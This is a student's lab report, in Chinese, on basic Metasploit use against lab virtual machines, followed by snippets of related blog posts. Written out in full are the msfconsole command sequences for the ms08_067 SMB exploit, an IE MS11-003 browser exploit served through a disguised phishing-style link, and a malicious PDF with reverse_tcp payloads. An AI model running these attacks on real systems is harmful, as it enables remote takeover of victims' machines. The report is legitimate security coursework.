1.实验要求

一个主动攻击实践,ms08_067;

一个针对浏览器的攻击,MS11-003(唯一);

一个针对客户端的攻击,adobe_toolbutton;

成功应用任何一个辅助模块Ipidseq(唯一)。


2.实验过程

2.1一个主动攻击实践,ms08_067

2.1.1在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

 use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp //tcp反向回连
set LHOST 192.168.23.128 //攻击机ip
set LPORT //攻击端口
set RHOST 192.168.23.131 //靶机ip
set target //自动选择目标系统类型,匹配度较高
exploit //攻击

2.1.2出现的问题:

1.一开始我是用了windows xp中文版的试了一下,结果就如下:

(无法创建会话界面)

这个原因就是因为windows xp中文版打了补丁,只能用别的版本。

2.如果出现以下问题:

就要检查以下靶机的防火墙有没有关掉,而且把链接调到桥接模式也很有必要。

2.2一个针对浏览器的攻击,MS11-003(唯一)

这个漏洞是在 /usr/share/metasploit-framework/modules/exploits/windows/browser 目录下找到的,就紧挨着MS11-050

2.2.1配置

1 msfconsole
2 use exploit/windows/browser/ms11_003_ie_css_import//使用针对ms11_003的渗透攻击模块
3 set PAYLOAD windows/meterpreter/reverse_tcp//设置载荷为TCP反向回连
4 set URIPATH (和20164325c)//设置URLPATH,就是跟在ip地址后面的页面的名称,内容可以随便写,比如说写成baidu.com将更具有迷惑性
5 set LHOST 192.168.23.128//设置本地主机地址
6 set LPORT //设置本地主机端口,只要是大于1024的都可以
7 set SRVPORT //设置钓鱼网站链接的假端口号,写成80也可以,写成443也行
8 set SRVHOST 192.168.23.128//钓鱼网站的地址要和本地主机地址保持一致
9 exploit

之后会生成一个钓鱼网站的链接,把这个链接到靶机上。

2.2.2对WinXP平台上的IE8进行攻击

本地主机显示连接没有问题,但是一直卡在传输css上面,而远程主机是显示完毕没有任何提示消息,也就是这个网站没有成功。然后我就再换个虚拟机进行攻击。

2.2.3对Win7平台上的IE8进行攻击

1.看到 successfully migrated to expolore.exe就说明成功建立会话了

2. sessions显示当前建立起的会话

3. sessions -i n 进入某一个会话,建议n值取会话id最大的那一个的值,只不过我这里就如图所示只有1

2.3一个针对客户端的攻击,adobe_toolbutton

2.3.1在msf下用search

2.3.2依次输入以下指令:

 use windows/fileformat/adobe_cooltype_sing
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.23.128 //攻击机ip
set LPORT //攻击端口
set FILENAME exp5_4325.pdf //设置生成pdf文件的名字
exploit //攻击

生成pdf:

2.3.3 将pdf文件传送或拷贝到靶机上(先把文件传到自己的电脑上,然后再复制到靶机上),在kali上输入back退出当前模块,进入监听模块,输入以下命令:

 use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp //tcp反向连接
set LHOST 192.168.23.128//攻击机ip
set LPORT //攻击端口固定
exploit

4. 然后在靶机上打开20164325.pdf文件,运行后,回连成功。

5. 运行ipconfig命令

2.4成功应用任何一个辅助模块Ipidseq(唯一)

功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。

拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。

TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。

2.4.1 use auxiliary/scanner/ip/ipidseq 查看需要设置的参数,设置完成后确认一下,然后就可以开始exploit了。

2.4.2设为对单一目标主机的扫描

2.4.3对指定网段的主机进行扫描:


3.基础问题回答

(1)用自己的话解释什么是exploit,payload,encode.

exploit:英文意思就是利用,就相当于是载具,使用者利用漏洞进行攻击的一个过程,将要负责攻击的代码传送到靶机中。

payload:载荷,相当于之前实验的后门,负责执行相应的攻击代码。

encode:shellcode的变形,用来编码、伪装,不让杀毒软件很轻易的就发现payload是攻击代码。

(2)离实战还缺些什么技术或步骤?

目前都只是针对XP系统进行攻击,而且现在学习的东西还只是最基础、最简单的,而且还是对已经发现的漏洞做攻击,所以说我觉得离实战还差一大截呢;所以还不能直接对现在的操作系统进行攻击,但是攻击原理应该是相同的。


4.实验总结

这次实验的过程我觉得还是很顺利的,就是在第一个部分的时候会有小问题;这次实验让我学会了msf的一些功能,我发现学无止境,还是要努力钻研;还有一点就是漏洞真的太多了,对于这方面我们也要注意。


Exp5MSF基础应用——20164325王晓蕊的更多相关文章

  1. Exp3 免杀原理与实践 ——20164325王晓蕊

    一.实践基本内容 1.实践目标 (1) 正确使用msf编码器(√),msfvenom生成如jar之类的其他文件(√),veil-evasion(√),加壳工具(√),使用shellcode编程(√) ...

  2. Exp2 后门原理与实践-------20164325王晓蕊

    Exp2 后门原理与实践 任务一:使用netcat获取主机操作Shell,cron启动 1.windows获取linux shell 1.1 ipconfig  查看本机查看以太网适配器(8)的ipv ...

  3. Exp6 信息搜集与漏洞扫描——20164325王晓蕊

    1.实践目标 掌握信息搜集的最基础技能与常用工具的使用方法. 2.实践内容 2.1 各种搜索技巧的应用 2.1.1 Netcraft查询 Netcraft这个网站可以查询到特定网站的IP地址,以wei ...

  4. Exp4 恶意代码分析 ——20164325王晓蕊

    1.实践目标 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析Exp2或Exp3中生成后门软件:分析工具尽量使用原生指令或sysinternals,systracer套件 ...

  5. Exp1 PC平台逆向破解----20164325 王晓蕊

    前言:实验中用到的知识 JE:条件转移指令,如果相等则跳转: JNE:条件转移指令(等同于“Jump Not Equal”),如果不相等则跳转: JMP:无条件跳转指令.无条件跳转指令可转到内存中任何 ...

  6. 20145202马超《网络对抗》Exp5MSF基础应用

    20145202马超<网络对抗>Exp5MSF基础应用 本实践目标,掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  7. JavaScript脚本语言基础(四)

    导读: JavaScript和DOM DOM文档对象常用方法和属性 DOW文档对象运用 JSON数据交换格式 正则表达式 1.JavaScript和DOM [返回] 文档对象模型(Document O ...

  8. 面向对象多继承(c3算法)、网络基础和编写网络相关的程序

    一.面向对象多继承(c3算法) a.有多个父类先找左,再找右,如下示例: class A(object): pass class B(object): def f1(self): print('B') ...

  9. Daily target小队介绍(刘畅,陈杰,杨有存,唐祎琳,王晓哲,邵汝佳)

    一.团队介绍 1.团队构成: 2.队名: Daily target,我们的口号是Target your day! 3.团队项目描述: 我们计划写一个用于老师发布任务,学生接受任务的安卓app.教师安排 ...

随机推荐

  1. 解决Oracle数据库空间不足问题

    //查询表空间的大小以及文件路径地址select tablespace_name, file_id, file_name,round(bytes/(1024*1024),0) total_space ...

  2. Servle第四篇(会话技术之cookie)

    会话技术 什么是会话技术 基本概念: 指用户开一个浏览器,访问一个网站,只要不关闭该浏览器,不管该用户点击多少个超链接,访问多少资源,直到用户关闭浏览器,整个这个过程我们称为一次会话. 为什么我们要使 ...

  3. JVM学习01:内存结构

    JVM学习01:内存结构 写在前面:本系列分享主要参考资料是  周志明老师的<深入理解Java虚拟机>第二版. 内存结构知识要点Xmind梳理 案例分析 分析1 package com.h ...

  4. python-django(框架结构)

    项目架构: 最外层myshop目录:项目的容器,没有实质性的作用 .idea:项目的配置信息.这个文件夹是自动生成,版本控制信息等,包括历史记录.无用 manage.py:(管理项目)一个实用的命令行 ...

  5. JAVA常用注解

    摘自:https://www.cnblogs.com/guobm/p/10611900.html 摘要:java引入注解后,编码节省了很多需要写代码的时间,而且精简了代码,本文主要罗列项目中常用注解. ...

  6. 原生js简单轮播图 代码

    在团队带人,突然被人问到轮播图如何实现,进入前端领域有一年多了,但很久没自己写过,一直是用大牛写的插件,今天就写个简单的适合入门者学习的小教程.当然,轮播图的实现原理与设计模式有很多种,我这里讲的是用 ...

  7. oracle redo日志文件损坏恢复

    参考:How to Recover from Loss Of Online Redo Log And ORA-312 And ORA-313 (Doc ID 117481.1) 在线重做日志文件丢失后 ...

  8. Linux permission denied问题

    初试Linux 本来想试一试递归的mkdir -p结果遇到了permission denied,但是自己明明是管理员啊 查了博客,在文件名前加上chmod 777 ,例如chmod 777  temp ...

  9. Codeforces 1083B The Fair Nut and Strings

    Description 给定两个由 \('a'\), \('b'\) 组成的字符串 \(a\), \(b\),以及两个整数 \(n\) 和 \(k\) \(n\) 表示字符串 \(a\),\(b\) ...

  10. EasyPR源码剖析(5):车牌定位之偏斜扭转

    一.简介 通过颜色定位和Sobel算子定位可以计算出一个个的矩形区域,这些区域都是潜在车牌区域,但是在进行SVM判别是否是车牌之前,还需要进行一定的处理.主要是考虑到以下几个问题: 1.定位区域存在一 ...